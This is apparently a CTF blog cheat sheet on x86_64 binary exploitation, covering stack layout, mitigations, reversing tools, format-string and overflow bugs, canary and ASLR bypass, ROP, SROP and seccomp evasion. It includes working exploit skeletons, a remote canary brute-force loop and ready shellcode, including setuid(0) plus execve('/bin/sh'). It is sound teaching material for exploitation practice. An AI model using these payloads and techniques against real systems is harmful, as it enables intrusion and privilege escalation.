Binary Exploitation - Architecture, Reversing, Exploitation & Shellcode

Posted on 2026-05-03 In ctf Views: Disqus:

x86_64 Architecture & Stack

Byte Order & Packing

Most Linux CTF binaries on x86/x86_64 are little-endian: the least significant byte is stored at the lowest address.
0x40123a packed as 64-bit little-endian becomes 3a 12 40 00 00 00 00 00.
This matters for partial overwrites: overflowing byte-by-byte overwrites the low bytes of a saved pointer first.

from pwn import *

p8(0x41)                 # b'A'
p16(0x1234)              # b'4\x12'
p32(0xdeadbeef)          # b'\xef\xbe\xad\xde'
p64(0x40123a)            # b':\x12@\x00\x00\x00\x00\x00'

u64(leak.ljust(8, b'\x00'))

Registers

word = 2 bytes, dword = 4 bytes, qword = 8 bytes
RBP: frame/base pointer, RSP: stack pointer, RIP: instruction pointer.
Writing to 32-bit registers (e.g., EAX) automatically clears the upper 32 bits of the corresponding 64-bit register (RAX). xor EAX, EAX is equivalent to xor RAX, RAX but has a shorter encoding.

Memory access sizes:

mov [RAX], bl    ; 1 byte
mov [RAX], bx    ; 2 bytes (word)
mov [RAX], ebx   ; 4 bytes (dword)
mov [RAX], rbx   ; 8 bytes (qword)

Calling Convention (SysV ABI)

Arguments: RDI, RSI, RDX, RCX, R8, R9.
Return Value: RAX (with RDX potentially holding high bits or extra data).
Syscall arguments: RDI, RSI, RDX, R10, R8, R9; syscall number in RAX.
RCX and R11 are clobbered by syscall.
x86_32: Arguments are passed via the stack in right-to-left order.

1 2	man syscall grep -R "__NR_execve" /usr/include/asm* /usr/include/x86_64-linux-gnu/asm* 2>/dev/null

REX.W Prefix (0x48)

The REX prefix range is 0x40-0x4F (0100 WRXB), used to extend x86 instructions to 64-bit:

W: Set to 1 for 64-bit operations.
R, X, B: Extension for register addressing (R8-R15).

mov RDI, RSP requires a REX prefix with W=1 → 0100 1000 = 0x48.

Stack Frame Layout

RBP (Register): Points to the bottom of the current function stack frame. Local variables are accessed relative to it (e.g., [RBP - 0x10]).
saved RBP (Stack Data): A backup of the caller's RBP, used to restore the previous frame upon return.

Prologue & Epilogue

; Prologue (Entering Function B)
push RBP        ; Save Caller A's RBP -> becomes saved RBP
mov RBP, RSP    ; Establish B's stack frame

; Epilogue (Exiting Function B) - Equivalent to 'leave; ret'
mov RSP, RBP    ; Clean up local variables
pop RBP         ; Restore Caller A's RBP
ret             ; Return to Caller A

High Addr  +-------------------------------+
           |  Caller's Stack Frame         |
           +-------------------------------+
           |  return address               |  ← call instruction auto-push
           +-------------------------------+  ← reg RBP points here
           |  saved RBP                    |  ← stores caller's RBP
           +-------------------------------+
           |  local variables              |  ← accessed via [RBP - offset]
           +-------------------------------+  ← reg RSP (stack top)
Low Addr   |  (unused)                     |
           +-------------------------------+

Memory Management

Segments

.text: Executable code.
.data: Initialized global writable data.
.rodata: Read-only data (strings, constants).
.bss: Uninitialized global writable data.
stack: Local variables and function metadata.
heap: Dynamically allocated memory via malloc().

Viewing memory maps:

1	cat /proc/<pid>/maps

Von Neumann Architecture

In memory, bytes can represent either code or data; the CPU distinguishes them solely based on RIP. Bytes pointed to by RIP are executed as opcodes, while others accessed via pointers are treated as data.

Security Mitigations

Name	Description
NX	No-eXecute bit. Hardware-level page attribute marking memory pages as non-executable.
W^X	Write XOR Execute. Memory is either writable or executable, never both simultaneously.
ASLR	Address Space Layout Randomization. Randomizes memory layout at runtime.
PIE	Position Independent Executable. Randomizes the `binary` base address.
canary	Stack protector. Detects `buffer overflow` by checking a secret value before returning.

Checksec Reading

Mitigation	Exploitation impact
No Canary	Saved `RIP` overwrite is usually direct once the offset is known.
Canary	Need leak, byte brute-force, non-return control flow, or write primitive that skips the canary.
NX disabled	Stack/heap shellcode is viable if control can jump to it.
NX enabled	Prefer ROP, ret2libc, `mprotect`, `mmap`, JOP/COP, or existing executable regions.
No PIE	Binary code addresses are fixed, e.g. `win()` / gadgets / PLT have stable absolute addresses.
PIE enabled	Need code pointer leak, PIE base recovery, or partial overwrite/brute force.
No RELRO	GOT is writable and can be overwritten before/after resolution.
Partial RELRO	`.got.plt` remains writable; lazy binding is still present.
Full RELRO	GOT is read-only after startup; GOT overwrite is blocked.
SHSTK	Intel CET shadow stack verifies returns; classic `ret` overwrite/ROP may fail.
IBT	Intel CET indirect branch tracking requires indirect-call/jump targets to begin with `endbr64`.

checksec hints at the easiest path, but it is not a proof. A binary with executable stack may still be protected by SHSTK/IBT, input filters, unstable stack addresses, or non-return exits.

ELF & Dynamic Linking

ELF header: architecture, entry point, program headers.
Program headers: loader view; maps segments into memory (LOAD, GNU_STACK, GNU_RELRO).
Section headers: linker/debugger view; useful for .text, .plt, .got, .bss, symbols.
PLT: stubs in the binary used to call imported functions.
GOT: table of resolved function/data addresses.
Lazy binding: first PLT call jumps into the dynamic resolver, which writes the real libc address into GOT.
RELRO: controls whether relocation/GOT pages become read-only after relocation.

file ./chall
readelf -h ./chall
readelf -l ./chall
readelf -S ./chall
readelf -s ./chall
readelf -r ./chall       # relocations / GOT targets
objdump -d ./chall | less
objdump -R ./chall       # dynamic relocations
strings -a ./chall | less

Address Translation

VA: virtual address used at runtime.
RVA / offset inside module: runtime_addr - module_base.
File offset: byte offset in the ELF file; not always equal to RVA because segments have mapping alignment.

In a non-PIE ELF, .text often loads near 0x400000. In a PIE ELF, disassemblers may show offsets such as 0x1d08; runtime address is pie_base + 0x1d08.

piebase
breakrva 0x1d08
vmmap
xinfo 0x555555555d08

Binary Analysis & Tools

CLI Tools

file hello        # Identify arch, linking, stripped status
strip hello       # Remove symbols
nm -a hello       # Show symbol tables
checksec --file=hello
ltrace ./hello    # Trace library calls
strace ./hello    # Trace system calls
strings -a hello  # Extract printable strings
readelf -a hello  # ELF metadata
objdump -d hello  # Disassembly

Reverse Engineering Workflow

Identify: file, checksec, readelf -h, rabin2 -I.
Triage strings/imports: strings, rabin2 -zz, rabin2 -i, IDA/Ghidra strings window.
Find control points: main, parser loop, comparison branches, win, system, /bin/sh, open/read/write, strcmp, memcmp, printf.
Recover input format: header magic, version, command/directive fields, length fields, endian, per-record size.
Trace data flow: where user bytes land, how size is computed, where pointers are stored, whether data is copied, validated, freed, or printed.
Convert checks into constraints: compare constants, printable-byte filters, checksums, jump tables, index math, bounds checks.
Exploit mapping: choose leak/write/control-flow primitive that matches mitigations.

Useful questions while reversing:

Is the binary stripped? If not, start with symbols. If stripped, start with imports, strings, and cross-references.
Does the program return normally, call exit, or loop forever? Return-address hijacking only triggers on a return path.
Does a length check use signed or unsigned comparison? Which width: byte, word, dword, or qword?
Are there hidden repeat/backdoor paths that re-enter the vulnerable function before canary validation?
Does a parser use a switch/jump table? Can an out-of-range or special directive reach extra code?

radare2 Quick Reference

rax2 0x28                         # Hex/decimal conversion
rabin2 -I ./chall                 # Binary info
rabin2 -z ./chall                 # Data-section strings
rabin2 -zz ./chall                # All strings
rabin2 -i ./chall                 # Imports
rabin2 -e ./chall                 # Entry points
r2 -A ./chall                     # Analyze and open
r2 -w ./chall                     # Open writable for patching
r2 -A -q -c "pdf @ main" ./chall # Non-interactive disassembly

Inside r2:

aaa             # Full analysis
afl             # List functions
s main          # Seek to symbol/address
s -             # Seek back
pdf             # Print current function
pdf @ sym.main  # Print a function
pd 20           # Print 20 instructions
px 64           # Hexdump
iz              # Strings in data sections
izz             # Strings in whole binary
axt @ addr      # Cross-references to address
axf @ addr      # Cross-references from address
VV              # Visual graph
wx 909090       # Patch raw bytes (requires -w)
wa nop          # Assemble and patch instruction (requires -w)

Patching Notes

Patching data is safer than patching code when the target check compares constants or file-format bytes.
For code patches, inspect instruction length first; replacing a longer conditional branch with shorter bytes needs padding with nop.
In non-PIE ELF, runtime VA is often near file mapping base 0x400000; still convert VA to file offset using program headers or tooling instead of guessing.

1
2
3

rasm2 -a x86 -b 64 "nop"
rasm2 -a x86 -b 64 -d "90"
objdump -d -Mintel ./chall | less

Pwndbg

pwndbg /path/to/binary    # Launch
start                     # Break at main (fails if no main symbol)
starti                    # Break at first instruction (initialization code)
entry                     # Break at ELF entry point
info functions            # List all analyzed function symbols
info frame                # Show current stack frame
piebase                   # Show PIE base address
vmmap                     # Show memory layout (r-x, rw-, etc.)
breakrva 0x19e3           # Break at Relative Virtual Address (useful for PIE)
stack                     # Show stack
canary                    # Print and find canaries on the stack
context <section>         # Show specific context window
checksec                  # Check for security features (NX, ASLR, PIE, Canary)
cyclic 100                # Generate 100-byte De Bruijn sequence
cyclic -l 0x6161616c      # Find overflow offset using crash address
retaddr                   # Highlight return addresses in the current stack frame
rop                       # Simple ROP Gadget search
got                       # Show GOT state (resolved vs unresolved)
plt                       # View Procedure Linkage Table
heap                      # Overview of all heap chunks and their status
bins                      # View free lists (fastbins, unsorted, small, large, tcache)
arena                     # View detailed structure of the main arena (malloc_state)

p $rsp                    # Show current stack pointer
disass main               # Disassemble 'main' function
break *main+123           # Breakpoint at main+123

Category	Command
Stepping	`n` (step over), `s` (step into), `fin` (finish), `c` (continue)
Breakpoints	`b *main+123`, `b <symbol>`
Memory	`x/11s <addr>`, `hexdump <addr> 44`, `tele <addr>`
Info	`context`, `vmmap`, `xinfo <addr>`, `checksec`

my ~/.gdbinit:

source /usr/share/pwndbg/gdbinit.py
set history save on
set follow-fork-mode child
set disassembly-flavor intel

# may be useless
set $mybase1 = 0x0000555555554000
set $mybase = 0x7ffff7ffc000

python
import os
import atexit
import pwndbg
from pwndbg.commands.context import contextoutput

if 'TMUX' in os.environ:
    created_panes = []

    def create_pane(split_cmd):
        output = os.popen(split_cmd).read().strip()
        if not output: return None, None
        pane_id, tty = output.split(":")
        created_panes.append(pane_id)
        return pane_id, tty

    p_disasm_id, p_disasm_tty = create_pane('tmux split-window -vb -P -F "#{pane_id}:#{pane_tty}" -l 75% -d "cat -"')
    p_stack_id, p_stack_tty = create_pane(f'tmux split-window -v -P -F "#{{pane_id}}:#{{pane_tty}}" -l 40% -t {p_disasm_id} -d "cat -"')
    p_bt_id, p_bt_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -t -1 -l 30% -d "cat -"')
    p_regs_id, p_regs_tty = create_pane(f'tmux split-window -h -P -F "#{{pane_id}}:#{{pane_tty}}" -t {p_stack_id} -l 30% -d "cat -"')
    p_ipy_id, p_ipy_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -l 30% -d "ipython"')

    if p_disasm_tty: contextoutput("disasm", p_disasm_tty, True, 'top', False)
    if p_stack_tty:  contextoutput("stack", p_stack_tty, True, 'top', False)
    if p_bt_tty:     contextoutput("backtrace", p_bt_tty, True, 'top', False)
    if p_regs_tty:   contextoutput("regs", p_regs_tty, True, 'top', False)

    if p_stack_tty: contextoutput("legend", p_stack_tty, True)
    if p_regs_tty:  contextoutput("expressions", p_regs_tty, True, 'top', False)

    def cleanup_panes():
        for pid in created_panes:
            os.system(f"tmux kill-pane -t {pid} >/dev/null 2>&1")

    atexit.register(cleanup_panes)
else:
    print("\n[\033[33m*\033[0m] Not running inside TMUX. Standard pwndbg output will be used.")

pwndbg.config.context_disasm_lines.value = 25
pwndbg.config.context_stack_lines.value = 18
end

pwntools

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
p = gdb.debug("./vuln", gdbscript="b *main+1\nc")
p.send(cyclic(123))
offset = cyclic_find(0x6161616a) # Finds 'jaaa'

import IPython
IPython.embed() # Launch IPython
# leak  = u64(p.recvline(keepends=False).ljust(8, b'\x00'))

sc = asm(shellcraft.sh())
sc = asm(shellcraft.cat("/flag"))
sc = asm(shellcraft.chmod("/flag", 0o444))

View shellcraft:

1
2
3

pwn shellcraft -l
# Output format (default: hex), choose from {e}lf, {r}aw, {s}tring, {c}-style array, {h}ex string, hex{i}i, {a}ssembly code, {p}reprocessed code, escape{d} hex string
pwn shellcraft amd64.linux.sh -f d

De Bruijn Sequence (Cyclic)

A De Bruijn sequence \(B(k, n)\) is a cyclic sequence where every possible string of length \(n\) over an alphabet of size \(k\) appears exactly once.

Why it's used: When a binary crashes due to a buffer overflow, the RIP will be overwritten by a 4 or 8-byte chunk of the sequence. Since every chunk is unique, cyclic_find can instantly determine the exact offset needed for the exploit.

Crash-offset workflow:

from pwn import *

context.arch = "amd64"
p = process("./chall")
p.send(cyclic(300))
p.wait()

# In GDB/pwndbg, read overwritten RIP/RSP value, then:
offset = cyclic_find(0x6161616c)      # 32-bit chunk
offset = cyclic_find(p64(0x6161616c6161616b), n=8)

For 64-bit patterns, keep n consistent between generation and lookup if you use non-default subsequence size.

Environment Control

Disable ASLR for Debugging: gdb disables ASLR by default. For a clean environment, use setarch x86_64 -R /bin/bash to spawn a shell where all child processes (excluding SUID) have ASLR disabled.
SUID Trap: gdb cannot disable ASLR for SUID binaries due to kernel security. Remove the SUID bit (chmod u-s) or copy the binary to a local directory before debugging.
Global ASLR Toggle: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space (Reset to 2 when finished).

Environment affects stack addresses. argv[0] length, environment variables, terminal, and pwntools launching mode can shift stack buffers. Use env={} in process() or add a NOP sled when stack shellcode depends on approximate addresses.

Information Disclosure Causes

String Termination Problems

C strings are null-terminated, meaning they lack length metadata and rely on a 0x00 byte to mark the end.

Missing Null byte: If a program reads exactly \(N\) bytes into an \(N\)-byte buffer (e.g., using read()), it won't append a null byte.
Disclosure: Functions like printf("%s") will continue reading past the buffer until they hit a null byte, potentially leaking adjacent sensitive data like a flag or canary.

Uninitialized Data (Stack Frame Reuse)

Frame Persistence: When a function returns, its stack frame is not cleared. The RSP simply moves back up.
Ghost Data: If a subsequent function call allocates a frame over the same memory area and fails to initialize its variables, it can read or "leak" the "ghost" data left by the previous function.

Compiler Backstabbing (Dead Store Elimination)

The Trap: A developer might use memset(buf, 0, size) to clear a sensitive flag before a function returns.
DSE: If the compiler (with -O2 or -O3) determines that buf is never accessed again before the function returns, it may "optimize out" the memset entirely, leaving the secret data on the stack. Use -fno-inline or specific memory barrier techniques to prevent this.

Format String Leaks

printf(user_input) treats user bytes as a format string. This can leak stack/register values and, with %n, write memory.

%p %p %p %p              # leak pointers
%lx.%lx.%lx              # leak words
%7$sAAAA<addr>           # read string from controlled address, offset depends on stack layout
%hn / %hhn / %n          # write 2 / 1 / pointer-sized count

Pwntools helpers:

from pwn import *

offset = FmtStr(exec_fmt).offset
payload = fmtstr_payload(offset, {elf.got["printf"]: libc.sym["system"]})

Common path with writable GOT: leak a libc address, calculate libc.address, then overwrite printf@GOT/puts@GOT with system or an offset into win.

Memory Corruption Primitives

Stack Buffer Overflow

Typical offset calculation:

buf = rbp - 0x60
saved RBP = rbp
return address = rbp + 8
offset_to_ret = 0x60 + 8

Ret2win payload:

1	payload = b"A" * offset_to_ret + p64(elf.sym["win"])

If win_authed(token) checks a stack/local token, sometimes jump past the check instead of calling the function entry. This is an offset jump. Make sure the target instruction does not depend on skipped setup.

Canary Bypass Patterns

Direct leak: program prints past the canary because the input overwrote its leading \x00 terminator.
Residual stack leak: another function leaves a canary copy or secret in reused stack memory.
Recursive/retry path: trigger a path that re-enters vulnerable code before the outer canary is checked.
Fork brute-force: child crashes do not randomize parent canary; brute-force byte-by-byte.
Skip canary write zone: corrupt loop index, pointer, length, or destination so writes land after the canary.

Stack canary on amd64 usually has a null low byte. Leak reconstruction often looks like:

1 2	canary = u64(b"\x00" + leak7) payload = flat(b"A" * off, canary, b"B" * 8, target)

Signedness & Integer Bugs

Danger pattern: check in signed arithmetic, use in unsigned API.

int size;
scanf("%d", &size);
if (size <= 64) {
    read(0, buf, size);   // size converted to size_t
}

-1 passes size <= 64, then becomes 0xffffffffffffffff as size_t.

Integer multiplication overflow:

1 2	uint32_t bytes = count * record_size; if (bytes <= sizeof(buf)) read(0, buf, count * record_size);

If multiplication truncates before the check but the later copy/read uses the larger semantic size, bounds checks fail.

OOB Indexing

Negative index can read/write before an array.
Positive overlarge index can reach later locals, heap metadata, GOT, vtables, function pointers, or adjacent objects.
Convert byte distance to index by dividing by element size.

1	index = (target_addr - array_base) // element_size

Partial Pointer Overwrite

Partial overwrite changes only low bytes of a pointer. Useful when high bytes are stable due to page alignment or same mapping.

1	payload = b"A" * offset + p16(target_low_16)

This works best when source and destination are in the same module/stack/heap region or when only the low page offset must change.

GOT Overwrite

Requirements:

GOT target must be writable (No RELRO or sometimes Partial RELRO).
A write primitive reaches the target GOT entry.
The overwritten function is called after the overwrite.

Common targets:

printf@GOT -> system, then pass "/bin/sh" or a command string to printf.
puts@GOT -> win + offset, but avoid recursion if win itself calls puts first.

Heap Bug Classes

UAF: use a pointer after free; can become type confusion if the freed chunk is reallocated as another object.
Double free: same chunk inserted into a free list twice; allocator-dependent exploitability.
Overflow into metadata/object: corrupt size, next pointer, function pointer, vtable, length, or data pointer.
Aliased backing store: a high-level view (ArrayBuffer, slice, sprite, ledger view) still references native heap memory after resize/free.

Pwndbg commands:

heap
vis_heap_chunks
bins
tcachebins
fastbins
unsortedbin
arena

ASLR & Bypass Techniques

Method 1: Memory Leak

Despite ASLR, the relative offset between functions and data within the same module remains constant.

Leak a known pointer (e.g., a function address in the GOT).
Subtract its constant offset to find the base address.
Calculate the addresses of all other gadgets/functions.

Method 2: Partial Overwrite (YOLO)

Memory is managed in pages (typically 0x1000 bytes). The lowest 12 bits of an address represent the page offset and are not randomized by ASLR.

Strategy: Overwrite only the least significant 1 or 2 bytes of the return address. This allows redirecting execution to a different instruction within the same page (or nearby) without knowing the randomized base. Overwriting 2 bytes usually requires a 1/16 brute-force of the 4th nibble.

Method 3: Fork Brute-force

In a fork()-based network server, child processes inherit the exact memory layout of the parent, including ASLR offsets and the canary.

Strategy: Brute-force the canary or return address byte-by-byte. If the child crashes, the parent simply forks a new one with the same values, allowing for infinite attempts.

Canary brute-force skeleton:

from pwn import *

canary = b"\x00"
for i in range(7):
    for guess in range(256):
        io = remote("host", 1337)
        payload = b"A" * offset_to_canary + canary + bytes([guess])
        io.send(payload)
        out = io.recvall(timeout=0.2)
        io.close()
        if b"stack smashing detected" not in out and b"crash" not in out:
            canary += bytes([guess])
            break

Method 4: ret2libc

With NX enabled, call existing libc code instead of injecting code.

Leak a libc pointer, e.g. puts(puts@GOT).
Compute libc.address = leaked_puts - libc.sym["puts"].
Call system("/bin/sh") or execve gadgets.

elf = ELF("./chall")
libc = ELF("./libc.so.6")
rop = ROP(elf)

payload = flat(
    b"A" * offset,
    rop.find_gadget(["pop rdi", "ret"])[0],
    elf.got["puts"],
    elf.plt["puts"],
    elf.sym["main"],
)

# receive leak, then second stage
libc.address = leak - libc.sym["puts"]
binsh = next(libc.search(b"/bin/sh\x00"))
payload = flat(
    b"A" * offset,
    ret,                         # optional stack alignment
    pop_rdi,
    binsh,
    libc.sym["system"],
)

Method 5: ret2plt / ret2csu

ret2plt: call imported functions through PLT when the binary has useful PLT entries and controlled arguments.
ret2csu: use gadgets inside __libc_csu_init to populate RDI, RSI, RDX when simple pop rdi; ret / pop rsi; ret gadgets are missing.

Typical ret2csu idea:

1 2	gadget 1: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret gadget 2: mov rdx,r15; mov rsi,r14; mov edi,r13d; call [r12+rbx*8]

Set rbx = 0, rbp = 1, r12 = function_pointer_table, r13 = arg1, r14 = arg2, r15 = arg3.

Method 6: SROP

Sigreturn-oriented programming uses a fake rt_sigreturn frame to set all registers. Useful when gadgets are scarce but you can execute syscall with RAX = 15 (rt_sigreturn).

frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret
payload = flat(b"A" * offset, pop_rax, 15, syscall_ret, bytes(frame))

Seccomp Notes

If shellcode or ROP mysteriously dies on execve, check seccomp filters.

1 2	seccomp-tools dump ./chall strace ./chall

Common bypasses:

If execve is blocked but file syscalls are allowed: open/read/write or sendfile the flag.
If open is blocked but openat allowed: use openat(AT_FDCWD, "/flag", 0).
If only read, write, exit, sigreturn are allowed: consider SROP or staged ROP.

Shellcoding

Toolchain

# Compile shellcode (static, no libc)
gcc -nostdlib -static shellcode.s -o shellcode-elf

# Extract raw shellcode bytes
objcopy --dump-section .text=shellcode-raw shellcode-elf

# Compile with RWX .text (for SMC)
gcc -Wl,-N --static -nostdlib -o test test.s

Forbidden Bytes

Avoid bytes that terminate or split input strings:

Byte	Name	Trigger
`0x00`	`null byte`	`strcpy`, `printf` (Terminator)
`0x0a`	`newline`	`fgets`, `scanf` (End of Input)
`0x20`	`space`	`scanf` (Separator)

Null Byte Avoidance Techniques

Bad	Good	Reason
`mov RAX, 0`	`xor EAX, EAX`	Avoids long `null byte` sequence
`mov RAX, 5`	`xor EAX, EAX; mov AL, 5`	Avoids `0x00` padding in 64-bit `mov`
`mov RAX, 10`	`push 9; pop RAX; inc RAX`	Avoids `0x0a` (`newline`)

Other size/filter tricks:

Use 32-bit register writes (eax, edi, esi) to avoid REX.W (0x48) and zero-extend into 64-bit registers.
Use push imm; pop reg for small constants.
Use cdq to zero/sign-fill RDX from EAX when EAX is positive.
Store strings on the stack in little-endian order.
XOR-encode constants to avoid bad bytes, then decode in-place.
If shellcode is called through a register, inspect live registers before execution; they may point to the shellcode mapping and save bytes with lea.

NOP Sled & Stack Shellcode

NOP sled (\x90) tolerates approximate jump targets. It is useful when stack addresses shift due to environment differences.

nop_sled = b"\x90" * 512
shellcode = asm(shellcraft.cat("/flag"))
payload = nop_sled + shellcode
payload = payload.ljust(offset, b"A") + p64(approx_stack_addr)

Avoid stack self-destruction: after ret, RSP points just above the return address. Shellcode using push may overwrite nearby bytes below RSP. Place shellcode sufficiently before/after the overwritten return path or use a large sled.

Staged Shellcode

When input length is too small, first-stage shellcode reads a larger second stage into RWX memory or stack, then jumps there.

; read(0, rsp, 0x400); jmp rsp
xor eax, eax
xor edi, edi
mov rsi, rsp
mov dx, 0x400
syscall
jmp rsp

Self-Modifying Code (SMC)

Runtime modification of the .text segment to bypass static filters. Requires the segment to be writable (-Wl,-N).

; Bypassing 'syscall' (0x0f05) filter
inc BYTE PTR [RIP+1]
.byte 0x0f
.byte 0x04            ; Runtime: 0x04 -> 0x05 (creating 0x0f05)

If the first page is made RX after input, place the patching code and patch targets on a later still-writable page, or use a first-stage jump over the protected region.

CET: SHSTK & IBT

Intel CET adds hardware CFI:

SHSTK (Shadow Stack): return addresses are mirrored on a protected shadow stack. ret compares the normal stack return address against the shadow one. A classic saved-RIP overwrite can crash even when canary is disabled.
IBT (Indirect Branch Tracking): indirect call/jmp targets must start with endbr64 (f3 0f 1e fa).
notrack prefix: notrack jmp rax can bypass IBT checks for that branch, so a corrupted function pointer/register may jump to shellcode or arbitrary code even when IBT is enabled.

When SHSTK blocks ROP, look for:

Non-return indirect branches: jmp rax, call rax, switch-table dispatch.
notrack jumps in compiler-generated switch code.
Writable function pointers, vtables, callback tables, jump-table indexes.
Logic bugs that reach win without hijacking ret.

Reference Shellcodes

x64 root shell (No REX.W/0x48)

# Avoids \x48 (REX.W prefix)
.global _start
_start:
.intel_syntax noprefix

    /* 0. Set UID to root (setuid(0)) */
    xor edi, edi        /* rdi = 0 (root UID) -> 31 ff */
    push 105            /* syscall 105 (0x69) = setuid */
    pop rax             /* 6a 69 58 */
    syscall

    /* 1. Prepare null bytes and allocate stack space */
    xor esi, esi
    push rsi            /* 8-byte null terminator */
    push rsi            /* space for /bin//sh */
    push rsp
    pop rdi             /* push rsp (0x54) + pop rdi (0x5f) avoids mov rdi, rsp (0x48) */

    /* 2. Construct /bin//sh on the stack (using 32-bit ops to avoid REX.W) */
    /* 0x6e69622f = "nib/", 0x68732f2f = "hs//" (little-endian) */
    mov dword ptr [rdi], 0x6e69622f
    mov dword ptr [rdi+4], 0x68732f2f

    /* 3. Set execve syscall number */
    push 59
    pop rax             /* avoids mov rax, 59 */

    /* 4. Clear edx (envp) and execute */
    xor edx, edx
    syscall

x64 execve("/bin/sh") (22-23 bytes)

; Standard 22-23 byte execve("/bin/sh")

; BITS 64

xor rsi, rsi        ; Clear RSI (argv = NULL)
push rsi            ; Push NULL terminator for string
mov rbx, 0x68732f2f6e69622f ; "/bin//sh" in little-endian
push rbx            ; Push string to stack
push rsp            ; Push address of string
pop rdi             ; RDI = address of "/bin//sh" (filename)
mov al, 0x3b        ; RAX = 59 (execve syscall number)
cdq                 ; RDX = 0 (envp = NULL) if RAX is positive
syscall             ; Execute

x64 cat /flag

.section .shellcode,"awx"
.global _start
_start:
.intel_syntax noprefix
    /* push b'/flag\x00' */
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f
    xor [rsp], rax
    /* call open('rsp', 'O_RDONLY', 'rdx') */
    push 2
    pop rax
    mov rdi, rsp
    xor esi, esi /* O_RDONLY */
    syscall
    /* call sendfile(1, 'rax', 0, 0x7fffffff) */
    mov r10d, 0x7fffffff
    mov rsi, rax
    push 40 /* 0x28 */
    pop rax
    push 1
    pop rdi
    cdq /* rdx=0 */
    syscall

x64 cat /flag (No REX.W/0x48)

.global _start
_start:
.intel_syntax noprefix

    /* 1. OPEN: open("/flag", O_RDONLY) -> Syscall 2 */
    xor esi, esi                    /* rsi = 0 (O_RDONLY) -> 31 f6 */
    push rsi                        /* null terminator */
    push rsp
    pop rdi                         /* rdi points to stack top (avoids mov rdi, rsp) */

    /* Construct "/flag" using 32-bit and 8-bit writes */
    /* "/fla" = 0x616c662f */
    mov dword ptr [rdi], 0x616c662f /* c7 07 2f 66 6c 61 */
    /* "g" = 0x67 */
    mov byte ptr [rdi+4], 0x67      /* c6 47 04 67 */

    push 2
    pop rax                         /* open syscall number */
    syscall                         /* fd returned in rax */

    /* 2. READ: read(fd, buffer, size) -> Syscall 0 */
    xchg eax, edi                   /* rdi = fd, clears rax (0x97) */

    push rsp
    pop rsi                         /* rsi = rsp (buffer) */

    mov dl, 100                     /* rdx = 100 (size) using 8-bit register */
    xor eax, eax                    /* read syscall number */
    syscall

    /* 3. WRITE: write(stdout, buffer, size) -> Syscall 1 */
    xchg eax, edx                   /* rdx = bytes read (0x92) */

    push 1
    pop rdi                         /* rdi = 1 (stdout) */

    push 1
    pop rax                         /* write syscall number */
    syscall

x64 cat /flag (No 'syscall' opcode)

.section .shellcode,"awx"
.global _start
_start:
.intel_syntax noprefix
    /* push b'/flag\x00' */
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f
    xor [rsp], rax
    /* call open('rsp', 'O_RDONLY', 'rdx') */
    push 2
    pop rax
    mov rdi, rsp
    xor esi, esi
    inc byte ptr [rip + patch_target1 + 1]
patch_target1:
    .byte 0x0f
    .byte 0x04            /* Patched to 0x0f05 at runtime */
    /* call sendfile(1, 'rax', 0, 0x7fffffff) */
    mov r10d, 0x7fffffff
    mov rsi, rax
    push 40
    pop rax
    push 1
    pop rdi
    cdq
    inc byte ptr [rip + patch_target2 + 1]
patch_target2:
    .byte 0x0f
    .byte 0x04

Common Terms

Term	Description
ROP	Return-Oriented Programming. Chaining "gadgets" ending in `ret`.
JOP/COP	Jump/Call-Oriented Programming. Chains indirect `jmp`/`call` dispatch instead of `ret`.
ret2win	Overwrite control flow to a hidden/success function in the binary.
ret2libc	Redirecting execution to a `libc` function instead of shellcode.
ret2plt	Calling a PLT stub in the binary, often to leak or invoke imported functions.
ret2csu	Using `__libc_csu_init` gadgets to set up multi-register function calls.
SROP	Sigreturn-Oriented Programming. Fake a signal frame to control registers.
PLT/GOT	Procedure Linkage Table & Global Offset Table. Used for resolving external library function addresses.
OOB	Out-of-bounds. Accessing memory outside the intended range of an array or buffer.
UAF	Use-after-free. Reusing a pointer after its backing allocation has been freed.
SMC	Self-modifying code. Code patches its own bytes at runtime.
CET	Intel Control-flow Enforcement Technology: mainly `SHSTK` and `IBT`.
endbr64	Valid landing instruction required by IBT for indirect branch targets.

Exploit Skeletons

Local/Remote Toggle

#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF("./chall", checksec=False)
context.terminal = ["tmux", "splitw", "-h"]

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([elf.path] + argv, gdbscript="""
        set disassembly-flavor intel
        break *main
        continue
        """, *a, **kw)
    if args.REMOTE:
        return remote("host", 1337)
    return process([elf.path] + argv, *a, **kw)

io = start(env={})

Run with:

1
2
3

python solve.py
python solve.py GDB
python solve.py REMOTE

Leak Parsing

io.recvuntil(b"leak: ")
leak = int(io.recvline().strip(), 16)

raw = io.recvn(6)
addr = u64(raw.ljust(8, b"\x00"))

Flat Payloads

payload = flat(
    b"A" * offset,
    canary,
    b"B" * 8,
    pop_rdi,
    next(libc.search(b"/bin/sh\x00")),
    libc.sym["system"],
)

Python: Integer to Byte Conversion

In Python, converting an integer (0-255) to a byte string requires careful handling of the bytes() constructor:

Incorrect: bytes(guess)
- If guess = 5, this creates a null-filled byte string of length 5: b'\x00\x00\x00\x00\x00'.
Correct: bytes([guess])
- Passing a list (iterable) treats the integer as the actual byte value.
- If guess = 65, bytes([65]) results in b'A' (0x41).

movaps

movaps (Move Aligned Packed Single-Precision Floating-Point Values) 是 x86/x64 架构下的一条 SIMD（单指令多数据流）指令，主要用于高效的数据传输。

SIMD 向量化处理与高吞吐率： 现代 CPU 为了优化数据处理效率，会利用 XMM 寄存器执行向量化操作。movaps 能够单次吞吐 128 位（16 字节）的数据，极大地提升了内存带宽利用率。该指令被广泛应用于音视频编解码、图形渲染及密码学算法等密集型矩阵运算场景。
